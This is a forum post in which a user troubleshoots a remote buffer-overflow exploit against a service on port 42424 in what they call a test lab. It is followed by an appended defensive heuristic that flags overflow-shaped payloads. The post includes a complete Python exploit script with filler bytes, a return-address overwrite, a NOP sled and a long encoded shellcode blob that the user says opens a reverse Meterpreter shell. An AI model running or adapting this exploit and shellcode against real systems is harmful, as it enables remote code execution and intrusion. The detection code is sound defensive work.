confuscious1080 Posted October 6, 2019

Hi, I am attempting to exploit a remote buffer overflow as part of a test lab environment. The exploit works fine in a Windows 7 test VM and I can get a reverse Meterpreter to my Kali Linux VM with ASLR turned off on the Windows VM. However, when I attempt this in the test environment against the machine that I know is running the application on port 42424, I do not get the reverse shell. I have tried this with both x86 and x64 shellcode. If I test locally on the Kali machine I can crash the application, but again I also do not get a shell. My exploit code is below:

#!/usr/bin/env python2
import socket

ServiceManagerIP = "127.0.0.1"
ServiceManagerPort = 42424

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ServiceManagerIP, ServiceManagerPort))

payload = "\xc3" * 146  # Junk bytes (filler up to the saved return address)
# Overwrite the return address with 0x77E9F7DF (written little-endian), then a NOP sled
payload += "\xDF\xF7\xE9\x77" + "\x90" * 16
# Shellcode to be executed by the application
payload += ("\xdb\xca\xd9\x74\x24\xf4\xb8\x0b\x9d\x83\x98\x5f\x2b\xc9\xb1"
            "\x52\x83\xc7\x04\x31\x47\x13\x03\x4c\x8e\x61\x6d\xae\x58\xe7"
            "\x8e\x4e\x99\x88\x07\xab\xa8\x88\x7c\xb8\x9b\x38\xf6\xec\x17"
            "\xb2\x5a\x04\xa3\xb6\x72\x2b\x04\x7c\xa5\x02\x95\x2d\x95\x05"
            "\x15\x2c\xca\xe5\x24\xff\x1f\xe4\x61\xe2\xd2\xb4\x3a\x68\x40"
            "\x28\x4e\x24\x59\xc3\x1c\xa8\xd9\x30\xd4\xcb\xc8\xe7\x6e\x92"
            "\xca\x06\xa2\xae\x42\x10\xa7\x8b\x1d\xab\x13\x67\x9c\x7d\x6a"
            "\x88\x33\x40\x42\x7b\x4d\x85\x65\x64\x38\xff\x95\x19\x3b\xc4"
            "\xe4\xc5\xce\xde\x4f\x8d\x69\x3a\x71\x42\xef\xc9\x7d\x2f\x7b"
            "\x95\x61\xae\xa8\xae\x9e\x3b\x4f\x60\x17\x7f\x74\xa4\x73\xdb"
            "\x15\xfd\xd9\x8a\x2a\x1d\x82\x73\x8f\x56\x2f\x67\xa2\x35\x38"
            "\x44\x8f\xc5\xb8\xc2\x98\xb6\x8a\x4d\x33\x50\xa7\x06\x9d\xa7"
            "\xc8\x3c\x59\x37\x37\xbf\x9a\x1e\xfc\xeb\xca\x08\xd5\x93\x80"
            "\xc8\xda\x41\x06\x98\x74\x3a\xe7\x48\x35\xea\x8f\x82\xba\xd5"
            "\xb0\xad\x10\x7e\x5a\x54\xf3\x41\x33\x39\x82\x2a\x46\xc5\x9a"
            "\xcb\xcf\x23\xc8\x1b\x86\xfc\x65\x85\x83\x76\x17\x4a\x1e\xf3"
            "\x17\xc0\xad\x04\xd9\x21\xdb\x16\x8e\xc1\x96\x44\x19\xdd\x0c"
            "\xe0\xc5\x4c\xcb\xf0\x80\x6c\x44\xa7\xc5\x43\x9d\x2d\xf8\xfa"
            "\x37\x53\x01\x9a\x70\xd7\xde\x5f\x7e\xd6\x93\xe4\xa4\xc8\x6d"
            "\xe4\xe0\xbc\x21\xb3\xbe\x6a\x84\x6d\x71\xc4\x5e\xc1\xdb\x80"
            "\x27\x29\xdc\xd6\x27\x64\xaa\x36\x99\xd1\xeb\x49\x16\xb6\xfb"
            "\x32\x4a\x26\x03\xe9\xce\x56\x4e\xb3\x67\xff\x17\x26\x3a\x62"
            "\xa8\x9d\x79\x9b\x2b\x17\x02\x58\x33\x52\x07\x24\xf3\x8f\x75"
            "\x35\x96\xaf\x2a\x36\xb3")

s.send(payload + "\r\n")
# Read whatever the service answers (the original referenced an undefined
# name, msg, here; a fixed buffer size is used instead)
data = s.recv(1024)
s.recv(1024)
s.close()
print data
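From the defender's side, the payload in the post above has a recognisable shape on the wire: a long run of a single filler byte, a 4-byte little-endian address, a NOP sled, and then a block of opaque bytes, all sent to a service port that normally sees short text. The following is an added example, not the poster's code, of a heuristic scorer that flags that shape in raw data received on such a port. The sample inputs are constructed here and contain no real shellcode; the thresholds (a 64-byte repeat run, an 8-byte sled, a 256-byte size limit) and the two-indicator verdict rule are assumptions chosen for illustration, not values from the post.

```python
#!/usr/bin/env python3
"""Heuristic check for overflow-shaped payloads sent to a service port.

Added example; not the poster's code. Only the port number (42424)
comes from the post. Sample payloads are constructed and contain no
real shellcode; thresholds are illustrative assumptions.
"""
import re

SERVICE_PORT = 42424  # port named in the post


def longest_byte_run(data: bytes) -> int:
    """Length of the longest run of one repeated byte value."""
    best = run = 0
    prev = None
    for b in data:
        run = run + 1 if b == prev else 1
        prev = b
        best = max(best, run)
    return best


def has_nop_sled(data: bytes, min_len: int = 8) -> bool:
    """True if the payload holds at least min_len consecutive 0x90 bytes."""
    return re.search(rb"\x90{%d,}" % min_len, data) is not None


def non_printable_ratio(data: bytes) -> float:
    """Fraction of bytes outside printable ASCII and common whitespace."""
    if not data:
        return 0.0
    bad = sum(1 for b in data if not (32 <= b < 127 or b in (9, 10, 13)))
    return bad / len(data)


def score_payload(data: bytes) -> dict:
    """Return each indicator plus a verdict; two or more hits is suspicious."""
    indicators = {
        "long_repeat_run": longest_byte_run(data) >= 64,   # filler bytes
        "nop_sled": has_nop_sled(data),                     # 0x90 sled
        "mostly_binary": non_printable_ratio(data) > 0.5,   # opaque code
        "oversized": len(data) > 256,                       # for a text protocol
    }
    hits = sum(indicators.values())
    return {**indicators, "hits": hits, "suspicious": hits >= 2}


def check_service_payload(port: int, data: bytes) -> dict:
    """Score only traffic for the watched port; other ports are passed through."""
    if port != SERVICE_PORT:
        return {"hits": 0, "suspicious": False, "skipped": True}
    return score_payload(data)


# --- constructed sample inputs (not taken from the post) ---
BENIGN_REQUEST = b"STATUS\r\n"
# A large but ordinary text request: only the size indicator should fire.
BENIGN_LARGE = b"GET /index.html HTTP/1.1\r\n" * 12
# Same layout as the post's payload: filler, a 4-byte address, a NOP sled,
# then opaque bytes standing in for shellcode (a byte ramp here, not code).
OVERFLOW_SHAPED = (b"A" * 146
                   + b"\xDF\xF7\xE9\x77"
                   + b"\x90" * 16
                   + bytes(range(128, 256)) * 3
                   + b"\r\n")


if __name__ == "__main__":
    for name, sample in [("benign", BENIGN_REQUEST),
                         ("benign_large", BENIGN_LARGE),
                         ("overflow_shaped", OVERFLOW_SHAPED)]:
        print(name, check_service_payload(SERVICE_PORT, sample))
```

The verdict requires two indicators so that a single large or binary-heavy message (a file upload, say) is not flagged on its own; the filler run and the sled are the two features that a plain oversized request almost never shows together.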